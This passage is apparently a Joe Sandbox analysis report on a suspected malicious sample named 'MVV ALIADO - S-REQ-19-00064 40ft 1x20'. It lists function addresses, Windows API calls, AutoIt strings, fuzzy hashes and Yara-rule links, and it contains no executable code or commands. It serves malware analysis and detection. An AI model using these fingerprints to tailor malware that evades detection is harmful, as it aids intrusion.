Instruction ID: d470ff47520c936e0dea1a77b40e981fe6d68d94f9822da4e417b252641203d8
Opcode Fuzzy Hash: 0db07bf6901c805b70ecfa70299210f07e28e2708b179d087fc4ca468d09c882
Instruction Fuzzy Hash: 10113671900129FBCF10EF98DD459EE7BBAEF09304F414455E901E7650DB34AA92CBA9

Function 006C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006C7352
MessageBoxW.USER32(?,?,?,?), ref: 006C7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006C739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006C73A2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 2cf5025ff832070d548523bdc1d875ddef98805d178e6b787b8134feb67c2957
Instruction ID: 8fc63a4238cffc521101126939f45868692f282f9f512a90f4ac4b1d525076e2
Opcode Fuzzy Hash: 2cf5025ff832070d548523bdc1d875ddef98805d178e6b787b8134feb67c2957
Instruction Fuzzy Hash: A411E576A04254FBC7019BA8DC05FEE7BAAEB45324F04831AF929D3251D7B48D009BA4

Function 0069D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0069D1BA
GetStockObject.GDI32(00000011), ref: 0069D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0069D1D8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 815c374cf86a39f3b75d0d328d792eea783954e5b9e683b97e95c17141eb68c6
Instruction ID: 3149e16c1511afa9d1414e0288137436cb81f18e5684a728fbfa4a5bdb6f9602
Opcode Fuzzy Hash: 815c374cf86a39f3b75d0d328d792eea783954e5b9e683b97e95c17141eb68c6
Instruction Fuzzy Hash: 5811A173101609FFEF114F909C50EEA7B6EFF09364F054216FA1552150CB35DC609BA0

Function 006B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 006B4E16

Part of subcall function 006B54F5: __fltout2.LIBCMT ref: 006B551E

__cftog_l.LIBCMT ref: 006B4E3C
__cftoe_l.LIBCMT ref: 006B4E6E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 4eb569bf20bb6ac17bea0fb2b1859a0afc989e7f147afe5cb902f879ff824b44
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 20014CB200014EBBCF525E84DC018EE3F63BB18390B588455FE1959132DB36DAB2EB85

Function 006A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006A7A0D: __getptd_noexit.LIBCMT ref: 006A7A0E

__lock.LIBCMT ref: 006A748F
InterlockedDecrement.KERNEL32(?), ref: 006A74AC
_free.LIBCMT ref: 006A74BF
InterlockedIncrement.KERNEL32(00CA4D20), ref: 006A74D7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 09c358c4d4671f3445ee2ff200be19f63c49e9e3905e037122fd881f801dafbb
Instruction ID: e0b6c5b50cf9b4998904d6a17338e20de43b691898e8a2ce362c206bbb2c0edb
Opcode Fuzzy Hash: 09c358c4d4671f3445ee2ff200be19f63c49e9e3905e037122fd881f801dafbb
Instruction Fuzzy Hash: 2501A131909A11EBD761BF649D0679DBBA2FF0A722F14801DF454A7781CB286D01CFDA

Function 006EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0069AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0069AFE3
Part of subcall function 0069AF83: SelectObject.GDI32(?,00000000), ref: 0069AFF2
Part of subcall function 0069AF83: BeginPath.GDI32(?), ref: 0069B009
Part of subcall function 0069AF83: SelectObject.GDI32(?,00000000), ref: 0069B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006EEA8E
LineTo.GDI32(00000000,?,?), ref: 006EEA9B
EndPath.GDI32(00000000), ref: 006EEAAB
StrokePath.GDI32(00000000), ref: 006EEAB9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 3f5b230307aeb2c3d63f95803f9fe450427eb987129b1be4280c890562b27c6b
Instruction ID: 4c08ba38fa335e5976bdc5f9b57dfe1537335d75658a9459b3f145b99024b3ca
Opcode Fuzzy Hash: 3f5b230307aeb2c3d63f95803f9fe450427eb987129b1be4280c890562b27c6b
Instruction Fuzzy Hash: BAF05431006359B7DB226F94AC0DFCA3F5A6F06311F04C205FE15651E18B799951CBDD

Function 006BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006BC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 006BC85D
GetCurrentThreadId.KERNEL32 ref: 006BC864
AttachThreadInput.USER32(00000000), ref: 006BC86B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 682f9c66ae1d4638d564e9b3678741fcaee3120167792905189fe994d10e4c15
Instruction ID: 6e428cedd4cc5b7e2f1f2eb309d1eee18ac04879a8164e550908a8eb2f924a77
Opcode Fuzzy Hash: 682f9c66ae1d4638d564e9b3678741fcaee3120167792905189fe994d10e4c15
Instruction Fuzzy Hash: E0E039B1142328BADB205BA29C0DEDB7F1CEF067A1F008121B60985460CAB68A81DBE0

Function 006BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 006BB0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,006BAC9D), ref: 006BB0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006BAC9D), ref: 006BB0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,006BAC9D), ref: 006BB0F1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 572bc2aaf9462d3022b86ab30cff468a4db27a54ac69af23b5f06cb2cae77e30
Instruction ID: 42a3eb2588ee167e67213343652b9b5fbabd936bc438918b57be1537ddd0ed07
Opcode Fuzzy Hash: 572bc2aaf9462d3022b86ab30cff468a4db27a54ac69af23b5f06cb2cae77e30
Instruction Fuzzy Hash: 38E04F72601311DBD7302FF15D0CBD73BA9AF55791F01C918A245D6040DEA888418768

Function 0069B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0069B496
SetTextColor.GDI32(?,000000FF), ref: 0069B4A0
SetBkMode.GDI32(?,00000001), ref: 0069B4B5
GetStockObject.GDI32(00000005), ref: 0069B4BD
GetWindowDC.USER32(?,00000000), ref: 006FDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 006FDE38
GetPixel.GDI32(00000000,?,00000000), ref: 006FDE51
GetPixel.GDI32(00000000,00000000,?), ref: 006FDE6A
GetPixel.GDI32(00000000,?,?), ref: 006FDE8A
ReleaseDC.USER32(?,00000000), ref: 006FDE95

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d820fbce5cb8f70a3327c59d72cc07c34e0b30fc01025acb5228e575a3360a8b
Instruction ID: 017c21e6df09a9fe5eac93b8986c94d32d81f76d4a6f71042b2cecdb5df23dc7
Opcode Fuzzy Hash: d820fbce5cb8f70a3327c59d72cc07c34e0b30fc01025acb5228e575a3360a8b
Instruction Fuzzy Hash: 60E06D31100348EADF315BA4EC0DBE83F12AB11339F00C326FB69980E1DBB54990DB11

Function 006BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 006BB2DF
UnloadUserProfile.USERENV(?,?), ref: 006BB2EB
CloseHandle.KERNEL32(?), ref: 006BB2F4
CloseHandle.KERNEL32(?), ref: 006BB2FC

Part of subcall function 006BAB24: GetProcessHeap.KERNEL32(00000000,?,006BA848), ref: 006BAB2B
Part of subcall function 006BAB24: HeapFree.KERNEL32(00000000), ref: 006BAB32

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5f3cfe1458e4a09283ec537bf4c0d3939ea193cdcdfde6bd6708c5eb167530a4
Instruction ID: 62e59990bf56c4052e728dde817279fca89e06c900f746e8e32f72f5eaf560ba
Opcode Fuzzy Hash: 5f3cfe1458e4a09283ec537bf4c0d3939ea193cdcdfde6bd6708c5eb167530a4
Instruction Fuzzy Hash: 74E0923A104205EBCB112BE5EC08859FFA6FF883217109321F62581571CF76A861EB99

Function 006FB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006FB29A
GetDC.USER32(00000000), ref: 006FB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FB2C3
ReleaseDC.USER32 ref: 006FB2E2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7dbb6f243179c9c4f6d4cc030d38eda8cc3e5256b2a9e7ce2721670dbdf7b9ab
Instruction ID: 5b006291862aa4c6159f260b1dce7de8ecad1d4547e0af31da41808cb77448fc
Opcode Fuzzy Hash: 7dbb6f243179c9c4f6d4cc030d38eda8cc3e5256b2a9e7ce2721670dbdf7b9ab
Instruction Fuzzy Hash: EBE01AB1100304EFDB105FB0C84862E7BA9EB4C390F11CA19F95A87210DF7998418B48

Function 006FB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006FB2AE
GetDC.USER32(00000000), ref: 006FB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FB2C3
ReleaseDC.USER32 ref: 006FB2E2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 545abf6d5b157cac69e985e1d3cd6eac61a70de6df4c7e29e4789403f704eafe
Instruction ID: 5baad6b243902a9b002597a53f108bd5bcd4b5eeb24fc96a7ef56301b9bc0fca
Opcode Fuzzy Hash: 545abf6d5b157cac69e985e1d3cd6eac61a70de6df4c7e29e4789403f704eafe
Instruction Fuzzy Hash: 9AE046B1500300EFDF105FB0C84862D7BA9EB4C390F11CA19F95E8B210DF7A9C418B08

Function 006BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 006BDEAA

Strings

AutoIt3GUI, xrefs: 006BDE22
Container, xrefs: 006BDE29

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 1f7a30e80c05825778c1ac2a178fd3c94fe878bad9a462773dfe1aeb367d3420
Instruction ID: e91c4003ca400fd1282765701cd179f08ebda6b6de2fcd4d04ea0e043a78847d
Opcode Fuzzy Hash: 1f7a30e80c05825778c1ac2a178fd3c94fe878bad9a462773dfe1aeb367d3420
Instruction Fuzzy Hash: 949137B06007019FDB54DF64C884AAAB7FABF48714F10856DF94ACF691EB71E881CB60

Function 006C290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 006C2A72

Strings

I/o, xrefs: 006C29FC, 006C2A64, 006C2A12
I/o, xrefs: 006C297F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscpy
String ID: I/o$I/o
API String ID: 3048848545-1047360041
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: 10a84c4c7a975e7240208f017e8d694f18f5686794e6bee4e1bdb03660284e46
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: 2041A135900217AACF25EF99C461FFDB7B2EF08710F50505EEC81A7295DA309E82C7A8

Function 0069BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0069BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0069BCF3

Strings

@, xrefs: 0069BCE8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: de3143fed695bbcb8fce71a8075ab8492a64812897af220c253b43083caf9800
Instruction ID: e96b15931ef700c6102bd7981a075b65d3bdd5acb3bcfa6c22a99073019291a0
Opcode Fuzzy Hash: de3143fed695bbcb8fce71a8075ab8492a64812897af220c253b43083caf9800
Instruction Fuzzy Hash: 07515471409745EBE760AF14D886BAFBBECFF94354F41884EF1C8410A2DB7188A9C75A

Function 006CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 006844ED: __fread_nolock.LIBCMT ref: 0068450B

_wcscmp.LIBCMT ref: 006CC65D
_wcscmp.LIBCMT ref: 006CC670

Strings

FILE, xrefs: 006CC5A5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: d6b31cc2a5ebcda327c7db5de18698f4ff60753b81aad18465ae760d0b0ce604
Instruction ID: d8b483df8dcaefc0d5796d62797f3bf02dce8155ab800760cd4e36e8dde9211d
Opcode Fuzzy Hash: d6b31cc2a5ebcda327c7db5de18698f4ff60753b81aad18465ae760d0b0ce604
Instruction Fuzzy Hash: 4F41D972A0020ABBDF60EAA4DC41FEF77BAEF49714F00006DF505EB181DA759A04CB55

Function 006EA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 006EA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006EA86F

Strings

', xrefs: 006EA7C3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b9ac4118364411c6598f165e9a2f8deb0a5fdfb1c9d68df6a9a45db38a6dfcd1
Instruction ID: 48f111c8456aab3cbf2a6dc351f814c8a935b502e54c6e85f871a2af0224215e
Opcode Fuzzy Hash: b9ac4118364411c6598f165e9a2f8deb0a5fdfb1c9d68df6a9a45db38a6dfcd1
Instruction Fuzzy Hash: DC41F878E013499FDF54DFA9C881BDA7BBAFB09300F15416AE905AB341D770A942CFA1

Function 006E975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 006E980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006E984A

Strings

static, xrefs: 006E97AA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 17afcda3b4db7704206bf597932fe9fe72b5bda54555c26734ea498b33cb7375
Instruction ID: 58a447028b99540d5fa795e3d672d8126a2d402dae850fea82a6fc7e15bbe0fb
Opcode Fuzzy Hash: 17afcda3b4db7704206bf597932fe9fe72b5bda54555c26734ea498b33cb7375
Instruction Fuzzy Hash: 11319C71110744AEEB109F75CC80BFB73AAFF59760F108619F8A9C72A0DA35AC85C764

Function 006C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006C5201

Strings

0, xrefs: 006C51BF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
